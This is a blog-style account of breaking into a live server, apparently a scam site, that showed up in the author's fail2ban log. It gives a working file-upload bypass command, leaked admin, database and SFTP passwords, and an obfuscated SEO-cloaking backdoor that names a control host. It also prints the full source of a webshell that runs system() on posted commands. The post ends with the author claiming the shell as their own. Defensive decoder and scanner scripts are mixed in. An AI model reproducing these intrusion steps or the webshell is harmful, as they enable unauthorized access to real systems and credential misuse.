Cleaning Up a Vietnamese Zombie Box

Last week I installed fail2ban on my VPS; today I looked at the ban list and, well, a rich harvest 🤣. I picked one at random to practise on, this one: 160.***.***.236.

A quick scan with dddd first. It turned up http://160.***.***.236:806/ with directory listing enabled, exposing config files for game top-ups and the like, so this looks like a scam site.

Next I found an associated domain, https://bm.******.online/, an AI-written PHP admin panel. Weak credentials: admin/admin123.

Looking through the JS I found the /includes/upload_image.php endpoint. It only allows jpg/png/gif, so writing a PHP file straight to it gets nowhere. Out of ideas, I flipped through my notes on file-upload challenges and found the double-extension bypass.

```
curl -s -k -X POST "https://bm.******.online/includes/upload_image.php" \
-b /tmp/admin_cookies.txt \
-F "file=@/tmp/assert.gif;filename=shell.php"
{"url":"\/uploads\/69aacb960002e_shell.php"}
```
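The response above shows the backend kept the client's shell.php as the stored name, so whatever type check it did was applied to data the uploader controls. Below is a hardened handler I'm adding as an example (not the site's code): it sniffs the type from the file bytes, picks its own name and extension, and assumes the uploads directory is served with PHP execution disabled.

```php
<?php
// Hardened replacement for an upload_image.php-style endpoint (added example, not the
// backend's own code). The stored name and extension come only from server-side checks;
// the client filename and the client-supplied Content-Type are never consulted.
declare(strict_types=1);

// Sniffed MIME type -> extension we assign ourselves.
const ALLOWED_TYPES = [
    'image/jpeg' => 'jpg',
    'image/png'  => 'png',
    'image/gif'  => 'gif',
];
const MAX_BYTES = 2 * 1024 * 1024;

/**
 * Validate an uploaded temp file and return the extension it must be stored with.
 * Throws RuntimeException on any failure. $tmpPath is PHP's own temp copy.
 */
function validateImageUpload(string $tmpPath, int $size, int $error): string
{
    if ($error !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload failed: error ' . $error);
    }
    if ($size <= 0 || $size > MAX_BYTES) {
        throw new RuntimeException('file size out of range');
    }
    // Sniff the real type from the bytes, not from $_FILES['file']['type'] or the name.
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $mime  = $finfo->file($tmpPath);
    if ($mime === false || !isset(ALLOWED_TYPES[$mime])) {
        throw new RuntimeException('not an allowed image type: ' . var_export($mime, true));
    }
    // getimagesize() must agree with the sniffed type. Note that a real GIF with PHP
    // appended still passes here; what stops it from ever running is the extension we
    // assign below plus a no-PHP-execution rule on the uploads directory.
    $info = @getimagesize($tmpPath);
    if ($info === false || $info['mime'] !== $mime) {
        throw new RuntimeException('image header does not match sniffed type');
    }
    return ALLOWED_TYPES[$mime];
}

/**
 * Move a validated upload into $uploadDir under a random name with the server-chosen
 * extension. Returns the stored filename.
 */
function storeImageUpload(array $file, string $uploadDir): string
{
    $ext  = validateImageUpload($file['tmp_name'], (int)$file['size'], (int)$file['error']);
    $name = bin2hex(random_bytes(16)) . '.' . $ext;   // client filename ignored entirely
    $dest = rtrim($uploadDir, '/') . '/' . $name;
    if (!is_uploaded_file($file['tmp_name']) || !move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('could not store upload');
    }
    chmod($dest, 0644);   // readable, never executable
    return $name;
}

// Request handling. Assumption: /uploads/ is served as static files only (for nginx, a
// location block that never passes the directory to php-fpm), so a stored .gif that
// happens to contain <?php tags is only ever sent as bytes, never interpreted.
if (PHP_SAPI !== 'cli') {
    header('Content-Type: application/json');
    try {
        if (!isset($_FILES['file'])) {
            throw new RuntimeException('no file field');
        }
        $stored = storeImageUpload($_FILES['file'], __DIR__ . '/../uploads');
        echo json_encode(['url' => '/uploads/' . $stored]);
    } catch (RuntimeException $e) {
        http_response_code(400);
        echo json_encode(['error' => $e->getMessage()]);
    }
}
```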

Hitting the shell did nothing, because system() is disabled. assert() still works, though (since PHP 7 it is a language construct, so disable_functions cannot block it; only zend.assertions=-1 stops it from being compiled at all). phpinfo() shows the disable_functions list, and no open_basedir:

```
passthru,exec,system,putenv,chroot,chgrp,chown,shell_exec,popen,proc_open,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,imap_open,apache_setenv
```

But the PHP version is 7.0, so the "PHP7 GC with Certain Destructors UAF" bypass applies; the AntSword plugin does it in one click. The web user is www.

/tmp/up.txt contains root 12***23A; I tried it, but the password is wrong.

/www/server/site_total/data/total/bm.******.online/host.txt lists about twenty further hostnames that have been served from the same box (.cc, .vip, .bf and .game domains among them).

Hm, they just switch domains and carry on scamming.

/data/zone/www/home/config/database.php gives away the database root password:

```php
define('DB_HOST', 'localhost');
define('DB_USER', 'root');
define('DB_PASS', 'loulxgame@com');
define('DB_NAME', 'web');
```

/www/wwwroot/bm.******.online/ holds encrypted webshells. One of them, 12z.php:

```php
<?php
/* Encrypted File - 20260117180056 */
$k='YmZjMjYyMDRlN2EyYWYyY2NlOWE5NGNhNTM1M2I3ZWJlNzkyNWI3MmQ0MTYwNDAwYmQ3ZjkxMWRiZWIxZThmNQ==';
$e='...'; /* several kilobytes of base64 ciphertext, omitted */
$d=base64_decode($e);           /* ciphertext bytes */
$k=base64_decode($k);           /* 64-byte key */
$r='';
for($i=0;$i<strlen($d);$i++){
$r.=$d[$i]^$k[$i%strlen($k)];   /* repeating-key XOR, one byte at a time */
}
eval('?>'.$r);                  /* run the recovered PHP; the '?>' lets it begin with <?php */
?>
```
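Added example (not the page's or the malware's code): a static decoder for this loader shape that recovers the XOR'd layer offline without eval()ing it. It assumes the key is the shorter of the two base64 literals, as in 12z.php, and the inner layer it prints may well be encoded again.

```php
<?php
// Static first-layer decoder for loaders of the 12z.php shape above (added example,
// not code from the page or from the malware). It reproduces the XOR loop offline
// and never eval()s the result, so the inner PHP can be read, hashed and scanned.
declare(strict_types=1);

/** Repeating-key XOR, exactly as the loader's for-loop does it. */
function xorWithKey(string $data, string $key): string
{
    $klen = strlen($key);
    $out  = '';
    for ($i = 0, $n = strlen($data); $i < $n; $i++) {
        $out .= $data[$i] ^ $key[$i % $klen];
    }
    return $out;
}

/**
 * Return the decoded inner layer of a loader that matches
 *   $k='<base64>'; $e='<base64>'; ... $r.=$d[$i]^$k[$i%strlen($k)]; eval('?>'.$r);
 * or null when the file does not carry that pattern.
 */
function decodeXorLoader(string $src): ?string
{
    // Require both tell-tales: the indexed XOR with a cycled key, and eval('?>'.
    $xorLoop = '/\$\w+\[[^\]]+\]\s*\^\s*\$\w+\[\s*\$\w+\s*%\s*strlen\(\s*\$\w+\s*\)\s*\]/';
    $evalTag = '/eval\s*\(\s*[\'"]\?>[\'"]\s*\./';
    if (!preg_match($xorLoop, $src) || !preg_match($evalTag, $src)) {
        return null;
    }
    // Every single-quoted literal that is valid base64 is a candidate key/ciphertext.
    if (!preg_match_all('/\$\w+\s*=\s*\'([A-Za-z0-9+\/=\r\n]+)\'\s*;/', $src, $m)) {
        return null;
    }
    $blobs = [];
    foreach ($m[1] as $lit) {
        $raw = base64_decode(preg_replace('/\s+/', '', $lit), true);
        if ($raw !== false && $raw !== '') {
            $blobs[] = $raw;
        }
    }
    if (count($blobs) < 2) {
        return null;
    }
    // Assumption: the key is the short blob (64 bytes in 12z.php), the ciphertext the long one.
    usort($blobs, function (string $a, string $b): int { return strlen($a) <=> strlen($b); });
    return xorWithKey(end($blobs), $blobs[0]);
}

/** Build a loader in the same layout from a constructed payload, for the self-test. */
function buildSampleLoader(string $payload, string $key): string
{
    $e = base64_encode(xorWithKey($payload, $key));
    $k = base64_encode($key);
    return "<?php\n/* Encrypted File */\n\$k='$k';\n\$e='$e';\n"
         . "\$d=base64_decode(\$e);\n\$k=base64_decode(\$k);\n\$r='';\n"
         . "for(\$i=0;\$i<strlen(\$d);\$i++){\n\$r.=\$d[\$i]^\$k[\$i%strlen(\$k)];\n}\n"
         . "eval('?>'.\$r);\n?>";
}

// Self-test on a constructed sample (not the real blob from the box), then report on
// any files given on the command line without modifying them.
$inner  = "<?php echo 'inner layer'; ?>";
$sample = buildSampleLoader($inner, 'constructed-key-0123');
if (decodeXorLoader($sample) !== $inner) {
    throw new RuntimeException('self-test failed');
}
foreach (array_slice($argv ?? [], 1) as $path) {
    $decoded = decodeXorLoader((string)file_get_contents($path));
    if ($decoded === null) {
        fwrite(STDERR, "$path: no XOR loader pattern found\n");
        continue;
    }
    printf("%s: %d bytes decoded, sha256 %s\n", $path, strlen($decoded), hash('sha256', $decoded));
    echo substr($decoded, 0, 200), "\n";   // inner layers are often encoded again
}
```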

ss.php, the other one, is obfuscated differently: it builds every function name by appending one character at a time and every other string by indexing into a base64-decoded alphabet, with junk comments sprinkled between statements.

tlc.txt just contains 1.
I deleted them. index.php and other files have the same modification date as the webshells; an obfuscated block (goto spaghetti, with every string written as octal and hex escapes) has been planted at the top of each of them.
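Added example, not from the page: a read-only triage script for exactly this situation. It correlates modification times against a known-bad file and scores the head of each PHP file for the goto-and-escaped-string style of the injected block; the thresholds and the sample tree it builds for its self-test are my own assumptions.

```php
<?php
// Triage for the pattern noted above: files whose mtime matches the webshell, and
// files whose head is goto spaghetti with every string written as \x../\ooo escapes.
// Added example, not the page's code; it only reads the webroot.
declare(strict_types=1);

/** Count obfuscation tell-tales in the first $bytes of a PHP source. */
function obfuscationScore(string $src, int $bytes = 4096): array
{
    $head  = substr($src, 0, $bytes);
    $gotos = (int)preg_match_all('/\bgoto\s+\w+\s*;/', $head);
    $esc   = (int)preg_match_all('/\\\\(?:x[0-9A-Fa-f]{2}|[0-7]{3})/', $head);   // "\x48", "\124"
    return [
        'gotos'          => $gotos,
        'escapes'        => $esc,
        'escape_density' => $esc / max(strlen($head), 1),
    ];
}

/** Assumed thresholds: the injected header has dozens of gotos and hundreds of escapes
 *  in its first few KB; hand-written PHP has essentially none of either. */
function looksInjected(string $src): bool
{
    $s = obfuscationScore($src);
    return $s['gotos'] >= 10 || $s['escape_density'] > 0.02;
}

/**
 * Walk $root and return [path => info] for each .php file that looks injected or whose
 * mtime lies within $tolerance seconds of $refMtime (the known-bad file's mtime).
 */
function triageWebroot(string $root, int $refMtime, int $tolerance = 120): array
{
    $hits = [];
    $it = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($root, FilesystemIterator::SKIP_DOTS)
    );
    foreach ($it as $f) {
        if (!$f->isFile() || strtolower($f->getExtension()) !== 'php') {
            continue;
        }
        $src      = (string)file_get_contents($f->getPathname());
        $sameTime = abs($f->getMTime() - $refMtime) <= $tolerance;
        $injected = looksInjected($src);
        if ($sameTime || $injected) {
            $hits[$f->getPathname()] = [
                'mtime'      => date('c', $f->getMTime()),
                'same_mtime' => $sameTime,
                'obfuscated' => $injected,
            ] + obfuscationScore($src);
        }
    }
    ksort($hits);
    return $hits;
}

if (isset($argv[2])) {
    // Real run: php triage.php /www/wwwroot/<site> /www/wwwroot/<site>/<known-bad>.php
    $hits = triageWebroot($argv[1], (int)filemtime($argv[2]));
} else {
    // Self-test on a constructed tree (not files from the box): one clean file, one with a
    // goto/escape header in the injected style, one stand-in webshell; mtimes set explicitly.
    $dir = sys_get_temp_dir() . '/triage_' . bin2hex(random_bytes(4));
    mkdir($dir . '/inc', 0700, true);
    $t0 = 1700000000;
    file_put_contents("$dir/inc/clean.php", "<?php\nfunction f(\$a) { return \$a + 1; }\n");
    touch("$dir/inc/clean.php", $t0 - 30 * 86400);
    $head = "<?php\ngoto A1; B2: \$h = \"\\x48\\124\\124\\120\"; goto C3; A1: \$u = \"\\x2f\\x3f\"; goto B2; C3: "
          . str_repeat("goto Lx; Lx: ", 12) . "\n// original application code would follow here\n";
    file_put_contents("$dir/index.php", $head);
    touch("$dir/index.php", $t0);
    file_put_contents("$dir/shell.php", "<?php eval('?>'.'x');\n");
    touch("$dir/shell.php", $t0 + 5);
    $hits = triageWebroot($dir, (int)filemtime("$dir/shell.php"));
    if (!isset($hits["$dir/index.php"]) || isset($hits["$dir/inc/clean.php"])) {
        throw new RuntimeException('self-test failed');
    }
    foreach (["$dir/inc/clean.php", "$dir/index.php", "$dir/shell.php"] as $p) { unlink($p); }
    rmdir("$dir/inc"); rmdir($dir);
}
foreach ($hits as $path => $info) {
    printf("%-50s %s same_mtime=%d obfuscated=%d gotos=%d escapes=%d\n", $path, $info['mtime'],
        (int)$info['same_mtime'], (int)$info['obfuscated'], $info['gotos'], $info['escapes']);
}
```

Files flagged only by mtime still need a manual look; files flagged by score are the ones to diff against a clean copy of the application before deleting anything.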

$YwVDi; goto hKJLw; fhxlP: if (isset($_SERVER["\110\124\x54\120\137\103\114\x49\x45\116\x54\137\x49\x50"])) { goto qSFnt; } goto O3ilp; aa89y: goto XS6rP; goto i_w1I; eOumY: PWuY6: goto tmGD9; ImT06: $LR82d = ''; goto N_nWZ; JV7ud: echo $cfzWG; goto ESm_2; sN56l: error_reporting(0); goto tai0M; kMzIO: exit; goto bmfEX; E2Woj: $XhGp0 = "\163\x74\x73\141\167"; goto dSm71; flseZ: $xxYrc = $_SERVER["\110\124\x54\120\137\x58\137\x46\x4f\x52\127\101\x52\104\105\104\137\106\117\122"]; goto GUiLP; uC7wa: $JHIHy = ''; goto GLjhg; LDXJ0: UOyS7: goto LR00l; asYIX: gWlmg: goto x2mLL; jYRml: if (!(strpos($onzye, "\164\x6c\143\164\x6c\143") !== false)) { goto QOAkV; } goto aRSyK; qhSy6: $cfzWG = @file_get_contents($gS141); goto Ne4xw; o7E_t: $onzye = urlencode($_SERVER["\122\x45\121\x55\x45\x53\x54\137\x55\122\x49"]); goto QuRaC; nyaa9: KcWHX: goto n62jh; DEf96: KMNyK: goto k6gD4; xWir5: goto mMHV2; goto pymXb; PJDII: ON84Q($BdhEj, "\60"); goto aa89y; nwmm0: wt7he: goto aTC9h; CajuY: if (strpos($CsxQD, "\x69\156\x64\x65\170\56\160\150") !== false) { goto CZw92; } goto rISDH; k6gD4: $gS141 = $BbVC1 . "\x3a\x2f\57" . $_SERVER["\x48\x54\124\x50\137\110\x4f\x53\x54"] . 
"\57\164\x6c\x63\164\x6c\x63"; goto qhSy6; mJN9n: VFktA: goto IzrrP; kWaWd: goto xsZWg; goto s7Av1; JU5BW: Cls4u: goto xWir5; Cdbk5: header("\x48\124\x54\120\57\61\x2e\x30\40\65\60\60\40\x49\156\164\x65\x72\156\x61\154\x20\123\x65\162\x76\145\162\x20\105\x72\x72\x6f\x72"); goto kMzIO; u09Mv: apZHz: goto vypMh; t1FHh: if (!(substr($cfzWG, 0, 10) == "\145\162\x72\x6f\162\40\x63\157\x64\x65" or $cfzWG == "\x35\60\60" or strpos($cfzWG, "\x42\x61\x64\40\107\141\164\x65\x77\x61\171") !== false)) { goto ADo8X; } goto Cdbk5; ucf7o: if (!(strpos($onzye, "\160\151\x6e\147\163\x69\x74\145\155\x61\x70") !== false)) { goto DoYCK; } goto c_DY0; NG3Q9: if (strpos($onzye, "\162\157\142\x6f\164\163\56\x74\170\x74") !== false or strpos($onzye, "\152\x70\62\x30\62\x33") !== false or strpos($onzye, "\160\151\x6e\147\163\151\164\x65\x6d\x61\160") !== false or preg_match("\x40\x5e\x2f\50\x2e\x2a\x3f\x29\56\170\x6d\154\x24\100\x69", $_SERVER["\x52\105\121\x55\x45\x53\124\137\x55\x52\111"]) or preg_match("\57\x28{$ybJan}\x29\57\x69", $_SERVER["\x48\x54\x54\x50\x5f\x55\x53\x45\122\137\x41\107\105\x4e\x54"]) or preg_match("\x2f\x28{$ybJan}\x29\57\x69", @$_SERVER["\x48\x54\124\120\x5f\x52\105\x46\105\x52\x45\x52"])) { goto HtX8k; } goto zfwa0; HhP0D: goto oyrH1; goto nyaa9; wGLdE: M20fC: goto uEuvU; MbtjR: $CsxQD = "\57"; goto SE3Xo; lSxj_: $vvypT = 0; goto PJDII; xLTSp: $vvypT = 1; goto koBlq; beCHo: oN84q("\x72\x6f\x62\x6f\164\x73\56\x74\x78\x74", $cfzWG); goto wyPKV; j7hlu: mMHV2:
?>

Remove it and save. The code is heavily obfuscated, but the webshell traits are recognizable; analysis follows later.

The other sites were backdoored the same way; I removed them one by one. I noticed logo.png had a similar modification time and checked whether it was an image webshell, but it was not.

Found an SFTP configuration at /www/wwwroot/******.online/.vscode/sftp.json

{
"name": "aaPanel PHP Server",
"host": "160.***.***.236",
"protocol": "sftp",
"port": 22,
"username": "root",
"password": "12***23A",
"remotePath": "/www/wwwroot/******.online",
"uploadOnSave": true,
"useTempFile": false,
"openSsh": false,
"ignore": [
".vscode",
".git",
".gitignore",
"node_modules"
]
}

But the password is wrong; it may already have been changed.

https://bm.nhangiax.online/analysis.php
FuCK1231

Now to analyze the webshell at the top of index.php; I handed it to Gemini:

1. Hard-coded core string parsing
The script hides a large number of hex (\x...) and octal (\...) encoded strings; the key information after decoding is:
C2 server address (remote control endpoint): http://cw4471.artistsaw.com/ (concatenated from $iqxFs . $i0oQL . $TW_jg . $XhGp0 . $YwVDi)
Liveness test / backdoor marker: tlctlc
Local marker files: tlc.txt, sitemap.xml, robots.txt
Key URI paths: jp2023, favicon.ico, pingsitemap
Target search engine signatures: duckduckgo|google|aol|yahoo|bing
Crawler UA regex: contains a large number of crawler signatures, such as SeznamBot, Scrapy, Googlebot, YandexBot, etc.

2. Core logic analysis
The script's main behavior is to decide, based on the visitor's identity (IP, UA, Referer) and the requested URI, whether to return a normal 404/403 or to pull content from the remote server and display it.
Liveness-check backdoor (quick win):
The code contains this logic: if (strpos($onzye, "tlctlc") !== false) { echo "ok"; exit; }
Meaning: if the requested URI contains tlctlc (for example /?a=tlctlc), the server directly returns ok. This is typically used by the challenge author to verify that the backdoor is alive, and can also serve as your sign that the script is running.
Identity spoofing (bypassing 403/404):
If your User-Agent is not a search engine crawler, or the Referer does not contain a search engine domain, the script will most likely execute goto fV5Np or goto i7Kcc and return 403 Forbidden or 404 Not Found.
Meaning: to trigger the deeper logic, you need to forge the HTTP headers: set the User-Agent to Googlebot, or set the Referer to https://www.google.com.
Sensitive file operations:
The script checks whether tlc.txt exists locally. If it does not, it creates it and sets $vvypT to 0. It also dynamically generates or modifies robots.txt and content containing sitemap.xml.
SSRF / remote request (advanced exploitation):
When specific conditions are met (accessing specific pages while posing as a search engine crawler), the script concatenates your IP, URI, UA and other information, uses curl or file_get_contents to send a request to the remote http://cw4471.artistsaw.com/, and echoes the fetched content back to the visitor.
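As a defender-side added example (not code from the page, the server, or Gemini's output): a small Python scanner that expands the \x and octal escapes this shell relies on and scores a PHP file on the traits described above, namely escape density, goto chains, a remote fetch keyed on $_SERVER values (the cloaking pattern), and command execution fed straight from request input. The three PHP fragments and the score thresholds are constructed for this example.

```python
import re

# Constructed PHP fragments for this example (not the files found on the server).
OBFUSCATED = r'''<?php goto A1; A1: $h = "\x68\164\164\x70"; goto B2; B2: $c = @file_get_contents($h . "\72\x2f\57"); goto C3; C3: if (strpos($_SERVER["\122\x45\121\x55\105\x53\124\x5f\125\x52\111"], "\164\x6c\x63") !== false) { echo "ok"; } ?>'''
SIMPLE_SHELL = '<?php if(!empty($_POST["cmd"])) { system($_POST["cmd"]); } ?>'
BENIGN = '<?php $n = "Hello\\n"; echo htmlspecialchars($n); ?>'

# PHP double-quoted escapes: \xHH (hex) and \ooo (octal), the two forms used in the shell.
ESCAPE_RE = re.compile(r'\\x([0-9A-Fa-f]{1,2})|\\([0-7]{1,3})')
GOTO_RE = re.compile(r'\bgoto\s+\w+\s*;')
# Traits are checked on the decoded source, so escape-encoded names cannot hide them.
TRAITS = {
    "exec_from_request": re.compile(r'\b(system|assert|eval|passthru|shell_exec|exec)\s*\(\s*\$_(POST|GET|REQUEST)\b'),
    "reads_server_vars": re.compile(r'\$_SERVER\['),
    "remote_fetch": re.compile(r'\b(file_get_contents|curl_exec)\s*\('),
}

def decode_php_escapes(src):
    """Expand \\xHH and \\ooo escapes so the real strings (URLs, header names) become readable."""
    def repl(m):
        if m.group(1) is not None:
            return chr(int(m.group(1), 16))
        return chr(int(m.group(2), 8))
    return ESCAPE_RE.sub(repl, src)

def scan_php(src, threshold=3):
    """Score one PHP source on webshell traits; return the decoded text plus the counters."""
    decoded = decode_php_escapes(src)
    escape_count = len(ESCAPE_RE.findall(src))
    goto_count = len(GOTO_RE.findall(src))
    hits = {name: bool(rx.search(decoded)) for name, rx in TRAITS.items()}
    score = 0
    if escape_count >= 8:          # hand-written code rarely spells identifiers in escapes
        score += 2
    if goto_count >= 3:            # goto chains are a flattened control-flow obfuscator
        score += 2
    if hits["exec_from_request"]:  # command execution fed directly from the request
        score += 3
    if hits["remote_fetch"] and hits["reads_server_vars"]:  # cloaking: fetch keyed on UA/URI
        score += 1
    return {"decoded": decoded, "escape_count": escape_count, "goto_count": goto_count,
            "traits": hits, "score": score,
            "verdict": "suspicious" if score >= threshold else "clean"}

if __name__ == "__main__":
    for name, src in (("obfuscated", OBFUSCATED), ("simple", SIMPLE_SHELL), ("benign", BENIGN)):
        r = scan_php(src)
        print(f"{name}: {r['verdict']} (score {r['score']}, escapes {r['escape_count']}, goto {r['goto_count']})")
```

Run it over a webroot with one scan_php call per .php file; the decoded text is what you paste into a manual review, since the C2 host and header names only appear after decoding.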

That ss.php is even more complex; it includes persistence and self-hiding (the .htaccess in the directory was actually created by it too; at the time I wondered why an nginx server would have one).

12z.php is a simpler webshell; after unpacking the base64 plus shift encoding, it looks like this:

?><?php
error_reporting(0);
session_start();

// Password: memek123
$pass = "memek123";

// Check login
if(isset($_GET['password'])) {
if($_GET['password'] === $pass) {
$_SESSION['login'] = true;
}
}

// If not logged in
if(!isset($_SESSION['login']) || $_SESSION['login'] !== true) {
echo ' ';
exit();
}

// WEBSHELL START
echo "<!DOCTYPE html>
<html>
<head>
<title></title>
<style>
body { font-family: monospace; background-color: #f9f9f9; padding: 20px; }
pre { font-size: 14px; }
.cmd-section { margin-top: 20px; }
.cmd-form { display: flex; gap: 10px; align-items: center; margin-bottom: 10px; }
.cmd-form input[type='text'] { flex: 1; padding: 5px; font-family: monospace; font-size: 14px; }
.cmd-form input[type='submit'] { padding: 5px 10px; }
textarea { width: 100%; height: 200px; font-family: monospace; font-size: 14px; }
a { text-decoration: none; color: #0645AD; }
a.visited { color: #b58900 !important; font-weight: bold; }
.logout { float: right; color: #e74c3c; font-weight: bold; }
</style>
<script>
document.addEventListener('DOMContentLoaded', function() {
document.querySelectorAll('a').forEach(function(link) {
if(localStorage.getItem(link.href)) {
link.classList.add('visited');
}
link.addEventListener('click', function() {
localStorage.setItem(link.href, '1');
});
});
});
</script>
</head>
<body>
<a class='logout' href='?logout=1'>Logout</a><pre>";

// Handle logout
if(isset($_GET['logout'])) {
session_destroy();
header('Location: ' . $_SERVER['PHP_SELF']);
exit();
}

$cwd = realpath($_GET['path'] ?? getcwd());
if(!$cwd || !file_exists($cwd)) $cwd = getcwd();

// Handle delete
if(isset($_GET['del'])) {
$target = realpath($_GET['del']);
if(is_file($target)) {
echo unlink($target) ? "[+] File deleted: $target\n" : "[-] Failed to delete file\n";
} elseif(is_dir($target)) {
echo rmdir($target) ? "[+] Directory deleted: $target\n" : "[-] Failed to delete directory\n";
}
}

// Handle rename
if(isset($_GET['rename'], $_POST['newname'])) {
$old = realpath($_GET['rename']);
$new = dirname($old) . '/' . basename($_POST['newname']);
echo rename($old, $new) ? "[+] Renamed to: $new\n" : "[-] Rename failed\n";
}

// Handle file save
if(isset($_GET['edit'], $_POST['content'])) {
$file = $cwd . '/' . basename($_GET['edit']);
echo file_put_contents($file, $_POST['content']) !== false ? "[+] File saved: $file\n" : "[-] Save failed\n";
}

// Handle file upload
if(isset($_POST["upload"]) && isset($_FILES["up"])) {
$up = $_FILES["up"];
$dest = $cwd . "/" . basename($up["name"]);
echo move_uploaded_file($up["tmp_name"], $dest) ? "[+] Uploaded: " . $up["name"] . "\n" : "[-] Upload failed\n";
}

// Breadcrumb
echo "<b>Current Dir:</b> ";
$parts = explode("/", trim($cwd, "/"));
$build = "";
echo "<a href='?path=/'>/</a>";
foreach($parts as $part) {
$build .= "/" . $part;
echo "<a href='?path=" . urlencode($build) . "'>$part</a>/";
}
echo "\n\n";

// Directory listing
$files = scandir($cwd);
natcasesort($files);

$dirs = [];
$regularFiles = [];

foreach($files as $f) {
if($f === "." || $f === "..") continue;
$full = $cwd . '/' . $f;
is_dir($full) ? $dirs[] = $f : $regularFiles[] = $f;
}

// Show directories
foreach($dirs as $f) {
$full = $cwd . '/' . $f;
echo "[DIR] <a href='?path=" . urlencode($full) . "'>$f</a> ";
echo "[ <a href='?del=" . urlencode($full) . "'>delete</a> | ";
echo "<a href='?rename=" . urlencode($full) . "'>rename</a> ]\n";
}

// Show files
foreach($regularFiles as $f) {
$full = $cwd . '/' . $f;
echo "[FILE] <a href='?path=" . urlencode($cwd) . "&read=" . urlencode($f) . "'>$f</a> ";
echo "[ <a href='?path=" . urlencode($cwd) . "&edit=" . urlencode($f) . "'>edit</a> | ";
echo "<a href='?del=" . urlencode($full) . "'>delete</a> | ";
echo "<a href='?rename=" . urlencode($full) . "'>rename</a> ]\n";
}

// File viewer
if(isset($_GET['read'])) {
$target = realpath($cwd . '/' . $_GET['read']);
if($target && is_file($target)) {
echo "\n<b>Viewing:</b> " . htmlspecialchars($target) . "\n\n";
echo htmlspecialchars(file_get_contents($target));
}
}

// Edit form
if(isset($_GET['edit']) && !isset($_POST['content'])) {
$file = $cwd . '/' . basename($_GET['edit']);
$content = htmlspecialchars(@file_get_contents($file));
echo "<form method='POST'>
<textarea name='content'>$content</textarea><br>
<input type='submit' value='Save'>
</form>";
}

// Rename form
if(isset($_GET['rename']) && !isset($_POST['newname'])) {
echo "<form method='POST'>
Rename to: <input type='text' name='newname'>
<input type='text' name='cmd'>
<input type='submit' value='Exec'>
</form>";

if(!empty($_POST["cmd"])) {
echo "<div>
<b>CMD Output:</b><br>
<textarea readonly>";
system($_POST["cmd"]);
echo "</textarea></div>";
}

echo "</div></pre></body></html>";
?>

OK, now this shell is mine.